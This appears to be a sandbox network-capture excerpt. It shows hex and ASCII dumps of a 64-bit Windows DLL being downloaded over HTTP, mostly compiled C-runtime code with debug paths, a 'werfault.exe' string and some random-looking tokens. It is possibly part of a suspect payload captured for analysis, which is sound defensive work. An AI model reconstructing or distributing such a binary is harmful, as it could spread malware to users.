                                                2022-05-23 06:34:53 UTC82INData Raw: 36 33 38 66 0d 0a 90 00 00 00 48 63 49 08 48 03 c1 48 63 4c 24 20 8b 04 c8 89 44 24 30 e8 9d 96 ff ff 48 8b 8c 24 90 00 00 00 48 63 49 08 48 03 c1 48 63 4c 24 20 83 7c c8 04 00 74 3a e8 7d 96 ff ff 48 89 44 24 48 e8 73 96 ff ff 48 8b 8c 24 90 00 00 00 48 63 49 08 48 03 c1 48 63 4c 24 20 48 63 44 c8 04 48 8b 4c 24 48 48 03 c8 48 8b c1 48 89 44 24 50 eb 09 48 c7 44 24 50 00 00 00 00 48 83 7c 24 50 00 0f 84 a7 00 00 00 44 8b 4c 24 30 4c 8b 84 24 90 00 00 00 48 8b 94 24 88 00 00 00 48 8b 8c 24 80 00 00 00 e8 61 eb ff ff e8 0c 96 ff ff 48 8b 8c 24 90 00 00 00 48 63 49 08 48 03 c1 48 63 4c 24 20 83 7c c8 04 00 74 3a e8 ec 95 ff ff 48 89 44 24 58 e8 e2 95 ff ff 48 8b 8c 24 90 00 00 00 48 63 49 08 48 03 c1 48 63 4c 24 20 48 63 44 c8 04 48 8b 4c 24 58 48 03 c8 48
                                                Data Ascii: 638fHcIHHcL$ D$0H$HcIHHcL$ |t:}HD$HsH$HcIHHcL$ HcDHL$HHHHD$PHD$PH|$PDL$0L$H$H$aH$HcIHHcL$ |t:HD$XH$HcIHHcL$ HcDHL$XHH
                                                2022-05-23 06:34:53 UTC86INData Raw: 44 24 70 e9 7b 03 00 00 48 8b 44 24 30 48 ff c0 48 89 44 24 30 48 8b 84 24 e0 00 00 00 48 83 c0 02 48 89 84 24 e0 00 00 00 e9 72 ff ff ff 48 8b 44 24 30 48 89 44 24 78 48 8d 4c 24 38 e8 78 07 ff ff 48 8b 44 24 78 e9 37 03 00 00 e9 45 02 00 00 48 8d 4c 24 38 e8 9f 07 ff ff 48 8b 00 8b 8c 24 f0 00 00 00 89 4c 24 28 48 8b 8c 24 e0 00 00 00 48 89 4c 24 20 41 b9 ff ff ff ff 4c 8b 84 24 e8 00 00 00 ba 09 00 00 00 8b 48 04 ff 15 30 c1 00 00 48 98 48 89 44 24 30 48 83 7c 24 30 00 74 27 48 8b 44 24 30 48 ff c8 48 89 84 24 80 00 00 00 48 8d 4c 24 38 e8 ff 06 ff ff 48 8b 84 24 80 00 00 00 e9 bb 02 00 00 ff 15 bc bf 00 00 83 f8 7a 74 3b e8 12 4a ff ff c7 00 2a 00 00 00 33 c0 48 8b 8c 24 e0 00 00 00 66 89 01 48 c7 84 24 88 00 00 00 ff ff ff ff 48 8d 4c 24 38 e8 b9 06
                                                Data Ascii: D$p{HD$0HHD$0H$HH$rHD$0HD$xHL$8xHD$x7EHL$8H$L$(H$HL$ AL$H0HHD$0H|$0t'HD$0HH$HL$8H$zt;J*3H$fH$HL$8
                                                2022-05-23 06:34:53 UTC90INData Raw: 00 48 8d 15 b5 0a 01 00 48 8d 0d 2e 0b 01 00 e8 91 4c ff ff b8 16 00 00 00 e9 aa 04 00 00 48 83 bc 24 b0 00 00 00 00 76 0a c7 44 24 68 01 00 00 00 eb 08 c7 44 24 68 00 00 00 00 8b 44 24 68 89 44 24 54 83 7c 24 54 00 75 2e 48 8d 05 44 0a 01 00 48 89 44 24 20 45 33 c9 41 b8 67 00 00 00 48 8d 15 6f 0a 01 00 b9 02 00 00 00 e8 75 42 ff ff 83 f8 01 75 03 cc 33 c0 83 7c 24 54 00 75 3e e8 e1 39 ff ff c7 00 16 00 00 00 48 c7 44 24 20 00 00 00 00 41 b9 67 00 00 00 4c 8d 05 35 0a 01 00 48 8d 15 16 0a 01 00 48 8d 0d e7 09 01 00 e8 f2 4b ff ff b8 16 00 00 00 e9 0b 04 00 00 48 8b 84 24 a8 00 00 00 c6 00 00 48 83 bc 24 b0 00 00 00 ff 74 68 48 81 bc 24 b0 00 00 00 ff ff ff 7f 74 5a 48 83 bc 24 b0 00 00 00 01 76 4f 48 8b 84 24 b0 00 00 00 48 ff c8 48 39 05 77 3e 01 00 73
                                                Data Ascii: HH.LH$vD$hD$hD$hD$T|$Tu.HDHD$ E3AgHouBu3|$Tu>9HD$ AgL5HHKH$H$thH$tZH$vOH$HH9w>s
                                                2022-05-23 06:34:53 UTC94INData Raw: 24 40 48 83 bc 24 a8 00 00 00 00 0f 84 75 01 00 00 48 8b 84 24 b0 00 00 00 48 39 44 24 40 0f 86 4b 01 00 00 48 83 bc 24 c0 00 00 00 ff 0f 84 27 01 00 00 48 8b 84 24 a8 00 00 00 c6 00 00 48 83 bc 24 b0 00 00 00 ff 74 68 48 81 bc 24 b0 00 00 00 ff ff ff 7f 74 5a 48 83 bc 24 b0 00 00 00 01 76 4f 48 8b 84 24 b0 00 00 00 48 ff c8 48 39 05 7c 2e 01 00 73 0e 48 8b 05 73 2e 01 00 48 89 44 24 78 eb 10 48 8b 84 24 b0 00 00 00 48 ff c8 48 89 44 24 78 48 8b 84 24 a8 00 00 00 48 ff c0 4c 8b 44 24 78 ba fe 00 00 00 48 8b c8 e8 af b0 fe ff 48 8b 44 24 40 48 39 84 24 b0 00 00 00 76 0d c7 84 24 80 00 00 00 01 00 00 00 eb 0b c7 84 24 80 00 00 00 00 00 00 00 8b 84 24 80 00 00 00 89 44 24 50 83 7c 24 50 00 75 2e 48 8d 05 9f fa 00 00 48 89 44 24 20 45 33 c9 41 b8 64 01 00 00
                                                Data Ascii: $@H$uH$H9D$@KH$'H$H$thH$tZH$vOH$HH9|.sHs.HD$xH$HHD$xH$HLD$xHHD$@H9$v$$$D$P|$Pu.HHD$ E3Ad
                                                2022-05-23 06:34:53 UTC99INData Raw: 3b e8 55 19 ff ff c7 00 22 00 00 00 48 c7 44 24 20 00 00 00 00 41 b9 8e 00 00 00 4c 8d 05 a9 e9 00 00 48 8d 15 ca ec 00 00 48 8d 0d a3 e8 00 00 e8 66 2b ff ff b8 22 00 00 00 eb 6c 33 c0 48 8b 4c 24 30 66 89 01 48 8b 44 24 30 48 83 e8 02 48 89 44 24 30 48 8b 44 24 30 0f b7 00 66 89 44 24 44 48 8b 44 24 30 48 8b 4c 24 48 0f b7 09 66 89 08 48 8b 44 24 48 0f b7 4c 24 44 66 89 08 48 8b 44 24 30 48 83 e8 02 48 89 44 24 30 48 8b 44 24 48 48 83 c0 02 48 89 44 24 48 48 8b 44 24 30 48 39 44 24 48 72 ae 33 c0 48 81 c4 98 00 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc 44 89 44 24 18 48 89 54 24 10 89 4c 24 08 48 83 ec 58 48 c7 44 24 30 ff ff ff ff 48 63 44 24 60 48 83 f8 fe 75 22 e8 a5 18 ff ff c7 00 00 00 00 00 e8 6a 18 ff ff c7 00 09 00 00 00 48 c7 c0 ff ff ff ff e9
                                                Data Ascii: ;U"HD$ ALHHf+"l3HL$0fHD$0HHD$0HD$0fD$DHD$0HL$HfHD$HL$DfHD$0HHD$0HD$HHHD$HHD$0H9D$Hr3HDD$HT$L$HXHD$0HcD$`Hu"jH
                                                2022-05-23 06:34:53 UTC103INData Raw: 24 a0 3d 00 00 0f 83 96 01 00 00 48 8d 84 24 a0 00 00 00 48 89 84 24 a8 14 00 00 48 8d 84 24 a0 00 00 00 48 8b 8c 24 a8 14 00 00 48 2b c8 48 8b c1 48 3d ff 13 00 00 0f 83 a7 00 00 00 48 8b 84 24 98 3d 00 00 48 8b 8c 24 a0 14 00 00 48 2b c8 48 8b c1 3b 84 24 a0 3d 00 00 0f 83 84 00 00 00 48 8b 84 24 a0 14 00 00 0f b6 00 88 84 24 b0 14 00 00 48 8b 84 24 a0 14 00 00 48 ff c0 48 89 84 24 a0 14 00 00 0f be 84 24 b0 14 00 00 83 f8 0a 75 28 8b 44 24 50 ff c0 89 44 24 50 48 8b 84 24 a8 14 00 00 c6 00 0d 48 8b 84 24 a8 14 00 00 48 ff c0 48 89 84 24 a8 14 00 00 48 8b 84 24 a8 14 00 00 0f b6 8c 24 b0 14 00 00 88 08 48 8b 84 24 a8 14 00 00 48 ff c0 48 89 84 24 a8 14 00 00 e9 37 ff ff ff 48 8d 84 24 a0 00 00 00 48 8b 8c 24 a8 14 00 00 48 2b c8 48 8b c1 8b 8c 24 90 3d
                                                Data Ascii: $=H$H$H$H$H+HH=H$=H$H+H;$=H$$H$HH$$u(D$PD$PH$H$HH$H$$H$HH$7H$H$H+H$=
                                                2022-05-23 06:34:53 UTC107INData Raw: ff ff c7 44 24 78 22 00 00 00 48 8d 4c 24 40 e8 0d b5 fe ff 8b 44 24 78 e9 25 02 00 00 48 8b 84 24 b8 00 00 00 0f b6 8c 24 c8 00 00 00 88 08 48 83 bc 24 b0 00 00 00 00 74 0e 48 8b 84 24 b0 00 00 00 c7 00 01 00 00 00 c7 44 24 7c 00 00 00 00 48 8d 4c 24 40 e8 c7 b4 fe ff 8b 44 24 7c e9 df 01 00 00 e9 d0 01 00 00 c7 44 24 68 00 00 00 00 48 8d 4c 24 40 e8 e7 0d 0a
                                                Data Ascii: D$x"HL$@D$x%H$$H$tH$D$|HL$@D$|D$hHL$@
                                                2022-05-23 06:34:53 UTC107INData Raw: 34 37 33 39 0d 0a b4 fe ff 48 8b 00 48 8d 4c 24 68 48 89 4c 24 38 48 c7 44 24 30 00 00 00 00 8b 8c 24 c0 00 00 00 89 4c 24 28 48 8b 8c 24 b8 00 00 00 48 89 4c 24 20 41 b9 01 00 00 00 4c 8d 84 24 c8 00 00 00 33 d2 8b 48 04 ff 15 a8 6d 00 00 89 44 24 6c 83 7c 24 6c 00 74 0b 83 7c 24 68 00 0f 84 2a 01 00 00 83 7c 24 6c 00 0f 85 f3 00 00 00 ff 15 09 6d 00 00 83 f8 7a 0f 85 e4 00 00 00 48 83 bc 24 b8 00 00 00 00 74 22 48 83 bc 24 c0 00 00 00 00 76 17 4c 8b 84 24 c0 00 00 00 33 d2 48 8b 8c 24 b8 00 00 00 e8 b3 7e fe ff 33 c0 85 c0 74 0d c7 84 24 94 00 00 00 01 00 00 00 eb 0b c7 84 24 94 00 00 00 00 00 00 00 8b 84 24 94 00 00 00 89 44 24 70 83 7c 24 70 00 75 2e 48 8d 05 6c c0 00 00 48 89 44 24 20 45 33 c9 41 b8 7b 00 00 00 48 8d 15 87 cf 00 00 b9 02 00 00 00 e8
                                                Data Ascii: 4739HHL$hHL$8HD$0$L$(H$HL$ AL$3HmD$l|$lt|$h*|$lmzH$t"H$vL$3H$~3t$$$D$p|$pu.HlHD$ E3A{H
                                                2022-05-23 06:34:53 UTC111INData Raw: 03 00 00 ff ff ff ff 48 8d 4c 24 78 e8 1a a4 fe ff 8b 84 24 84 03 00 00 e9 8e 09 00 00 e9 3a 06 00 00 8b 44 24 50 83 e0 20 85 c0 74 15 48 8b 84 24 18 03 00 00 0f b7 8c 24 b0 02 00 00 66 89 08 eb 11 48 8b 84 24 18 03 00 00 8b 8c 24 b0 02 00 00 89 08 c7 44 24 6c 01 00 00 00 e9 fc 05 00 00 c7 44 24 70 01 00 00 00 0f be 84 24 b8 02 00 00 83 c0 20 88 84 24 b8 02 00 00 8b 44 24 50 83 c8 40 89 44 24 50 48 8d 84 24 b0 00 00 00 48 89 44 24 40 c7 84 24 98 00 00 00 00 02 00 00 83 7c 24 74 00 7d 0a c7 44 24 74 06 00 00 00 eb 30 83 7c 24 74 00 75 17 0f be 84 24 b8 02 00 00 83 f8 67 75 0a c7 44 24 74 01 00 00 00 eb 12 81 7c 24 74 00 02 00 00 7e 08 c7 44 24 74 00 02 00 00 81 7c 24 74 a3 00 00 00 7e 56 8b 44 24 74 05 5d 01 00 00 48 98 41 b9 da 06 00 00 4c 8d 05 8b ac 00
                                                Data Ascii: HL$x$:D$P tH$$fH$$D$lD$p$ $D$P@D$PH$HD$@$|$t}D$t0|$tu$guD$t|$t~D$t|$t~VD$t]HAL
                                                2022-05-23 06:34:53 UTC115INData Raw: 48 83 ec 38 48 8b 44 24 40 48 83 c0 11 48 8b 4c 24 48 48 83 c1 11 48 8b d0 e8 e8 fb ff ff 85 c0 74 0a c7 44 24 20 00 00 00 00 eb 08 c7 44 24 20 01 00 00 00 0f b6 44 24 20 48 83 c4 38 c3 cc cc cc cc cc cc cc cc 89 54 24 10 48 89 4c 24 08 48 83 ec 28 48 8b 4c 24 30 e8 39 01 00 00 8b 44 24 38 83 e0 01 85 c0 74 0a 48 8b 4c 24 30 e8 44 02 00 00 48 8b 44 24 30 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc 48 89 54 24 10 48 89 4c 24 08 48 83 ec 28 48 8b 44 24 30 48 8d 0d fe b0 00 00 48 89 08 48 8b 44 24 30 48 c7 40 08 00 00 00 00 48 8b 44 24 30 c6 40 10 00 48 8b 44 24 38 48 8b 10 48 8b 4c 24 30 e8 3b 01 00 00 48 8b 44 24 30 48 83 c4 28 c3 cc 48 89 54 24 10 48 89 4c 24 08 48 83 ec 28 48 8b 44 24 30 48 8d 0d ae b0 00 00 48 89 08 48 8b 44 24 30 48 c7 40 08 00 00 00
                                                Data Ascii: H8HD$@HHL$HHHtD$ D$ D$ H8T$HL$H(HL$09D$8tHL$0DHD$0H(HT$HL$H(HD$0HHHD$0H@HD$0@HD$8HHL$0;HD$0H(HT$HL$H(HD$0HHHD$0H@
                                                2022-05-23 06:34:53 UTC119INData Raw: 48 8b 44 24 60 48 89 44 24 40 8b 44 24 74 05 5d 01 00 00 89 84 24 98 00 00 00 eb 08 c7 44 24 74 a3 00 00 00 33 c0 85 c0 74 2a 48 8b 84 24 18 06 00 00 48 83 c0 08 48 89 84 24 18 06 00 00 48 8b 84 24 18 06 00 00 48 8b 40 f8 48 89 84 24 98 05 00 00 eb 28 48 8b 84 24 18 06 00 00 48 83 c0 08 48 89 84 24 18 06 00 00 48 8b 84 24 18 06 00 00 48 83 e8 08 48 89 84 24 98 05 00 00 48 8b 84 24 98 05 00 00 48 89 84 24 58 05 00 00 48 8b 84 24 58 05 00 00 48 8b 00 48 89 84 24 08 05 00 00 48 8d 4c 24 78 e8 b8 82 fe ff 48 89 84 24 a0 05 00 00 0f be 8c 24 b8 04 00 00 89 8c 24 a8 05 00 00 48 63 94 24 98 00 00 00 48 89 94 24 b0 05 00 00 48 8b 0d 6a d8 00 00 ff 15 34 3b 00 00 48 8b 8c 24 a0 05 00 00 48 89 4c 24 30 8b 4c 24 70 89 4c 24 28 8b 4c 24 74 89 4c 24 20 8b 8c 24 a8 05
                                                Data Ascii: HD$`HD$@D$t]$D$t3t*H$HH$H$H@H$(H$HH$H$HH$H$H$XH$XHH$HL$xH$$$Hc$H$Hj4;H$HL$0L$pL$(L$tL$ $
                                                2022-05-23 06:34:53 UTC123INData Raw: 24 c8 00 00 00 e8 42 ba ff ff 83 f8 ff 74 69 48 8b 8c 24 c8 00 00 00 e8 30 ba ff ff 83 f8 fe 74 57 48 8b 8c 24 c8 00 00 00 e8 1e ba ff ff c1 f8 05 48 98 48 89 44 24 78 48 8d 0d bd ef 00 00 48 89 8c 24 80 00 00 00 48 8b 8c 24 c8 00 00 00 e8 f8 b9 ff ff 83 e0 1f 48 98 48 6b c0 58 48 8b 94 24 80 00 00 00 48 8b 4c 24 78 48 03 04 ca 48 89 84 24 88 00 00 00 eb 0f 48 8d 05 6d ba 00 00 48 89 84 24 88 00 00 00 48 8b 84 24 88 00 00 00 0f be 40 08 25 80 00 00 00 85 c0 0f 84 15 01 00 00 44 0f b7 8c 24 c0 00 00 00 41 b8 05 00 00 00 48 8d 54 24 30 48 8d 4c 24 24 e8 0e bf ff ff 85 c0 74 0a b8 ff ff 00 00 e9 85 01 00 00 c7 44 24 20 00 00 00 00 eb 0a 8b 44 24 20 ff c0 89 44 24 20 8b 44 24 24 39 44 24 20 0f 8d b5 00 00 00 48 8b 84 24 c8 00 00 00 8b 40 08 ff c8 89 84 24 90
                                                Data Ascii: $BtiH$0tWH$HHD$xHH$H$HHkXH$HL$xHH$HmH$H$@%D$AHT$0HL$$tD$ D$ D$ D$$9D$ H$@$
                                                2022-05-23 06:34:53 UTC125INData Raw: 64 31 38 0d 0a 01 00 00 4c 8d 05 a7 8d 00 00 48 8d 15 78 8d 00 00 48 8d 0d d1 84 00 00 e8 c4 c2 fe ff 48 c7 c0 ff ff ff ff eb 26 8b 44 24 50 c1 f8 05 48 98 48 8d 0d 9b ea 00 00 8b 54 24 50 83 e2 1f 48 63 d2 48 6b d2 58 48 8b 04 c1 48 8b 04 02 48 83 c4 48 c3 89 4c 24 08 48 83 ec 38 8b 44 24 40 c1 f8 05 48 98 48 8d 0d 68 ea 00 00 8b 54 24 40 83 e2 1f 48 63 d2 48 6b d2 58 48 03 14 c1 48 8b c2 48 89 44 24 28 c7 44 24 20 01 00 00 00 48 8b 44 24 28 83 78 0c 00 75 55 b9 0a 00 00 00 e8 d1 97 fe ff 90 48 8b 44 24 28 83 78 0c 00 75 35 48 8b 44 24 28 48 83 c0 10 ba a0 0f 00 00 48 8b c8 ff 15 c6 25 00 00 85 c0 75 08 c7 44 24 20 00 00 00 00 48 8b 44 24 28 8b 40 0c ff c0 48 8b 4c 24 28 89 41 0c b9 0a 00 00 00 e8 e6 97 fe ff 83 7c 24 20 00 74 30 8b 44 24 40 c1 f8 05 48
                                                Data Ascii: d18LHxHH&D$PHHT$PHcHkXHHHHL$H8D$@HHhT$@HcHkXHHHD$(D$ HD$(xuUHD$(xu5HD$(HH%uD$ HD$(@HL$(A|$ t0D$@H
                                                2022-05-23 06:34:53 UTC128INData Raw: 66 39 37 0d 0a 00 00 00 00 48 8b 44 24 30 c7 40 18 00 00 00 00 8b 44 24 38 48 83 c4 58 c3 89 4c 24 08 48 83 ec 58 48 63 44 24 60 48 83 f8 fe 75 15 e8 58 a3 fe ff c7 00 09 00 00 00 b8 ff ff ff ff e9 33 02 00 00 83 7c 24 60 00 7c 16 8b 05 4f dd 00 00 39 44 24 60 73 0a c7 44 24 3c 01 00 00 00 eb 08 c7 44 24 3c 00 00 00 00 8b 44 24 3c 89 44 24 34 83 7c 24 34 00 75 2e 48 8d 05 ad 82 00 00 48 89 44 24 20 45 33 c9 41 b8 2c 00 00 00 48 8d 15 28 82 00 00 b9 02 00 00 00 e8 6e ab fe ff 83 f8 01 75 03 cc 33 c0 83 7c 24 34 00 75 3e e8 da a2 fe ff c7 00 09 00 00 00 48 c7 44 24 20 00 00 00 00 41 b9 2c 00 00 00 4c 8d 05 ee 81 00 00 48 8d 15 cf 81 00 00 48 8d 0d 50 82 00 00 e8 eb b4 fe ff b8 ff ff ff ff e9 8c 01 00 00 8b 44 24 60 c1 f8 05 48 98 48 8d 0d c1 dc 00 00 8b 54
                                                Data Ascii: f97HD$0@D$8HXL$HXHcD$`HuX3|$`|O9D$`sD$<D$<D$<D$4|$4u.HHD$ E3A,H(nu3|$4u>HD$ A,LHHPD$`HHT
                                                2022-05-23 06:34:53 UTC132INData Raw: 31 30 66 31 0d 0a 5f 65 37 35 3c 65 64 6b 67 65 21 7a 24 55 39 6b 2b 68 00 00 00 00 00 00 00 00 6e 45 67 4b 45 75 59 74 53 36 59 92 3b fb 62 5a 87 1a a5 fb bb 6b ff eb 9c bd 89 80 6b f3 e7 ed bb c2 64 3d e4 a5 4c a6 0a 4d 90 33 47 46 51 77 6a 39 50 44 63 75 00 00 77 00 65 00 72 00 66 00 61 00 75 00 6c 00 74 00 2e 00 65 00 78 00 65 00 00 00 00 00 00 00 00 00 48 38 32 57 58 38 32 76 69 59 52 00 00 00 00 00 00 00 00 00 00 00 00 00 66 3a 5c 64 64 5c 76 63 74 6f 6f 6c 73 5c 63 72 74 5f 62 6c 64 5c 73 65 6c 66 5f 36 34 5f 61 6d 64 36 34 5c 63 72 74 5c 73 72 63 5c 64 6c 6c 63 72 74 30 2e 63 00 00 00 f0 c3 02 80 01 00 00 00 90 c4 02 80 01 00 00 00 66 3a 5c 64 64 5c 76 63 74 6f 6f 6c 73 5c 63 72 74 5f 62 6c 64 5c 73 65 6c 66 5f 36 34 5f 61 6d 64 36 34 5c 63 72 74
                                                Data Ascii: 10f1_e75<edkge!z$U9k+hnEgKEuYtS6Y;bZkkd=LM3GFQwj9PDcuwerfault.exeH82WX82viYRf:\dd\vctools\crt_bld\self_64_amd64\crt\src\dllcrt0.cf:\dd\vctools\crt_bld\self_64_amd64\crt
                                                2022-05-23 06:34:53 UTC136INData Raw: 00 6f 00 28 00 29 00 29 00 00 00 5f 00 70 00 72 00 69 00 6e 00 74 00 4d 00 65 00 6d 00 42 00 6c 00 6f 00 63 00 6b 00 44 00 61 00 74 00 61 00 00 00 00 00 25 2e 32 58 20 00 00 00 44 65 74 65 63 74 65 64 20 6d 65 6d 6f 72 79 20 6c 65 61 6b 73 21 0a 00 43 6f 72 45 78 69 74 50 72 6f 63 65 73 73 00 00 6d 00 73 00 63 00 6f 00 72 00 65 00 65 00 2e 0d 0a
                                                Data Ascii: o())_printMemBlockData%.2X Detected memory leaks!CorExitProcessmscoree.
                                                2022-05-23 06:34:53 UTC136INData Raw: 31 32 32 39 0d 0a 00 64 00 6c 00 6c 00 00 00 66 3a 5c 64 64 5c 76 63 74 6f 6f 6c 73 5c 63 72 74 5f 62 6c 64 5c 73 65 6c 66 5f 36 34 5f 61 6d 64 36 34 5c 63 72 74 5c 73 72 63 5c 69 6f 69 6e 69 74 2e 63 00 00 00 00 73 00 74 00 72 00 63 00 70 00 79 00 5f 00 73 00 28 00 2a 00 65 00 6e 00 76 00 2c 00 20 00 63 00 63 00 68 00 61 00 72 00 73 00 2c 00 20 00 70 00 29 00 00 00 00 00 00 00 5f 00 73 00 65 00 74 00 65 00 6e 00 76 00 70 00 00 00 00 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 6f 00 6f 00 6c 00 73 00 5c 00 63 00 72 00 74 00 5f 00 62 00 6c 00 64 00 5c 00 73 00 65 00 6c 00 66 00 5f 00 36 00 34 00 5f 00 61 00 6d 00 64 00 36 00 34 00 5c 00 63 00 72 00 74 00 5c 00 73 00 72 00 63 00 5c 00 73 00 74 00 64 00 65 00 6e 00 76 00 70 00 2e 00
                                                Data Ascii: 1229dllf:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.cstrcpy_s(*env, cchars, p)_setenvpf:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.
                                                2022-05-23 06:34:53 UTC140INData Raw: 69 00 6c 00 75 00 72 00 65 00 2c 00 20 00 73 00 65 00 65 00 20 00 74 00 68 00 65 00 20 00 56 00 69 00 73 00 75 00 61 00 6c 00 20 00 43 00 2b 00 2b 00 20 00 64 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 61 00 74 00 69 00 6f 00 6e 00 20 00 6f 00 6e 00 20 00 61 00 73 00 73 00 65 00 72 00 74 00 73 00 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 77 00 63 00 73 00 63 00 70 00 79 00 5f 00 73 00 28 00 73 00 7a 00 45 00 78 00 65 00 4e 00 61 00 6d 00 65 00 2c 00 20 00 32 00 36 00 30 00 2c 00 20 00 4c 00 22 00 3c 00 70 00 72 00 6f 00 67 00 72 00 61 00 6d 00 20 00 6e 00 61 00 6d 00 65 00 20 00 75 00 6e 00 6b 00 6e 00 6f 00 77 00 6e 00 3e 00 22 00 29 00 00 00 5f 00 5f 00 63 00 72 00 74 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 57 00 69 00 6e 00 64 00 6f 00 77 00 57
                                                Data Ascii: ilure, see the Visual C++ documentation on asserts.wcscpy_s(szExeName, 260, L"<program name unknown>")__crtMessageWindowW
                                                2022-05-23 06:34:53 UTC141INData Raw: 33 35 66 30 0d 0a 65 00 78 00 70 00 61 00 6e 00 64 00 2e 00 63 00 00 00 00 00 00 00 00 00 70 00 42 00 6c 00 6f 00 63 00 6b 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 00 00 00 00 28 00 66 00 6f 00 72 00 6d 00 61 00 74 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 6f 00 6f 00 6c 00 73 00 5c 00 63 00 72 00 74 00 5f 00 62 00 6c 00 64 00 5c 00 73 00 65 00 6c 00 66 00 5f 00 36 00 34 00 5f 00 61 00 6d 00 64 00 36 00 34 00 5c 00 63 00 72 00 74 00 5c 00 73 00 72 00 63 00 5c 00 69 00 73 00 63 00 74 00 79 00 70 00 65 00 2e 00 63 00 00 00 00 00 00 00 28 00 75 00 6e 00 73 00 69 00 67 00 6e 00 65 00 64 00 29 00 28 00 63 00 20 00 2b 00 20 00 31 00 29
                                                Data Ascii: 35f0expand.cpBlock != NULL(format != NULL)f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isctype.c(unsigned)(c + 1)
                                                2022-05-23 06:34:53 UTC145INData Raw: 00 28 00 28 00 28 00 5f 00 53 00 72 00 63 00 29 00 29 00 29 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 00 00 00 00 73 00 74 00 72 00 63 00 70 00 79 00 5f 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 6f 00 6f 00 6c 00 73 00 5c 00 63 00 72 00 74 00 5f 00 62 00 6c 00 64 00 5c 00 73 00 65 00 6c 00 66 00 5f 00 36 00 34 00 5f 00 61 00 6d 00 64 00 36 00 34 00 5c 00 63 00 72 00 74 00 5c 00 73 00 72 00 63 00 5c 00 74 00 63 00 73 00 63 00 70 00 79 00 5f 00 73 00 2e 00 69 00 6e 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 00 28 00 5f 00 44 00 73 00 74 00 29 00 29 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 20 00 26 00 26 00 20 00 28 00 28 00 5f 00 53 00 69 00 7a 00 65 00
                                                Data Ascii: (((_Src))) != NULLstrcpy_sf:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl((_Dst)) != NULL && ((_Size
                                                2022-05-23 06:34:53 UTC149INData Raw: 34 00 30 00 39 00 36 00 2c 00 20 00 31 00 30 00 29 00 00 00 5f 00 56 00 43 00 72 00 74 00 44 00 62 00 67 00 52 00 65 00 70 00 6f 00 72 00 74 00 41 00 00 00 77 00 63 00 73 00 74 00 6f 00 6d 00 62 00 73 00 5f 00 73 00 28 00 26 00 72 00 65 00 74 00 2c 00 20 00 73 00 7a 00 61 00 4f 00 75 00 74 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 2c 00 20 00 34 00 30 00 39 00 36 00 2c 00 20 00 73 00 7a 00 4f 00 75 00 74 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 2c 00 20 00 28 00 28 00 73 00 69 00 7a 00 65 00 5f 00 74 00 29 00 2d 00 31 00 29 00 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 73 00 74 00 72 00 63 00 70 00 79 00 5f 00 73 00 28 00 73 00 7a 00 4f 00 75 00 74 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 32 00 2c 00 20 00 34 00 30 00 39 00 36 00 2c 00 20
                                                Data Ascii: 4096, 10)_VCrtDbgReportAwcstombs_s(&ret, szaOutMessage, 4096, szOutMessage, ((size_t)-1))strcpy_s(szOutMessage2, 4096,
                                                2022-05-23 06:34:53 UTC153INData Raw: 00 72 00 63 00 5c 00 74 00 63 00 73 00 63 00 61 00 74 00 5f 00 73 00 2e 00 69 00 6e 00 6c 00 00 00 00 00 00 00 00 00 77 00 63 00 73 00 6e 00 63 00 70 00 79 00 5f 00 73 00 00 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 6f 00 6f 00 6c 00 73 00 5c 00 63 00 72 00 74 00 5f 00 62 00 6c 00 64 00 5c 00 73 00 65 00 6c 00 66 00 5f 00 36 00 34 00 5f 00 61 00 6d 00 64 00 36 00 34 00 5c 00 63 00 72 00 74 00 5c 00 73 00 72 00 63 00 5c 00 74 00 63 00 73 00 6e 00 63 00 70 00 79 00 5f 00 73 00 2e 00 69 00 6e 00 6c 00 00 00 00 00 00 00 b0 5a 01 80 01 00 00 00 62 61 64 20 65 78 63 65 70 74 69 6f 6e 00 00 00 90 95 02 80 01 00 00 00 e0 48 01 80 01 00 00 00 20 d6 01 80 01 00 00 00 5f 00 6d 00 62 00 73 00 74 00 6f 00 77 00 63 00 73 00 5f 00 6c 00 5f 00
                                                Data Ascii: rc\tcscat_s.inlwcsncpy_sf:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcsncpy_s.inlZbad exceptionH _mbstowcs_l_
                                                2022-05-23 06:34:53 UTC154INData Raw: 32 34 63 31 0d 0a 00 00 00 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 6f 00 6f 00 6c 00 73 00 5c 00 63 00 72 00 74 00 5f 00 62 00 6c 00 64 00 5c 00 73 00 65 00 6c 00 66 00 5f 00 36 00 34 00 5f 00 61 00 6d 00 64 00 36 00 34 00 5c 00 63 00 72 00 74 00 5c 00 73 00 72 00 63 00 5c 00 77 00 63 00 73 00 74 00 6f 00 6d 00 62 00 73 00 2e 00 63 00 00 00 00 00 70 00 77 00 63 00 73 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 00 00 00 00 00 00 00 00 73 00 69 00 7a 00 65 00 49 00 6e 00 42 00 79 00 74 00 65 00 73 00 20 00 3e 00 20 00 72 00 65 00 74 00 73 00 69 00 7a 00 65 00 00 00 00 00 00 00 